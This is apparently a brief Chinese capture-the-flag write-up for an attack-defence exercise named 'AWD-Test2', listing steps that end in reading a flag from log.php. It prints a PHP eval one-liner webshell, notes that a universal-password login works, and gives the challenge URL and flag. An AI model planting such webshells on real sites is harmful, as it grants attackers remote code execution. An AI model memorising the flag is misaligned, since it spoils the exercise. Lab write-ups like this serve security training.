AWD-Test2

1.已知账号密码,可SSH连接进行代码审计。

2.登录可万能密码 进入,也可注册 后登录。

3.修改url参数,发现报错。确定为Linux系统

4.写入一句话,并提交。(也可以文件上传,这里采用简洁的方法)

复制代码
<?php phpinfo();?>   //写入这个,在日志log.php可查看flag
<?php eval($_REQUEST[123]);?>

5.访问log.php日志文件,发现里面有flag

复制代码
http://efbc89f9-f04d-4204-b60b-65777640d4ef.node5.buuoj.cn:81/log.php

flag{399aa672-cf2d-4aca-9bec-693be96a9083}

注:如果没有,可以在前面一句话处填写 <?php phpinfo();?> 并提交。

相关推荐
恋猫de小郭1 天前
解读 Claude 对开发者的影响:AI 如何在 Anthropic 改变工作?
android·前端·ai编程
Evan芙1 天前
shell编程求10个随机数的最大值与最小值
java·linux·前端·javascript·网络
m0_740043731 天前
Vue 组件及路由2
前端·javascript·vue.js
奋斗吧程序媛1 天前
Vue2 + ECharts 实战:动态一个关键词或动态多关键词筛选折线图,告别数据重叠难题
前端·javascript·echarts
黛色正浓1 天前
【React】极客园案例实践-项目搭建和登录模块
前端·react.js·rust
低头不见1 天前
CTE聚合查询,性能优化不止10几倍
java·sql·postgresql
Healer9181 天前
js请求的并发控制
前端
是你的小橘呀1 天前
从 "渣男" 到 "深情男":Promise 如何让 JS 变得代码变得专一又靠谱
前端·javascript·html
baozj1 天前
告别截断与卡顿:我的前端PDF导出优化实践
前端·javascript·vue.js
傲文博一1 天前
为什么我的产品尽量不用「外置」动态链接库
前端·后端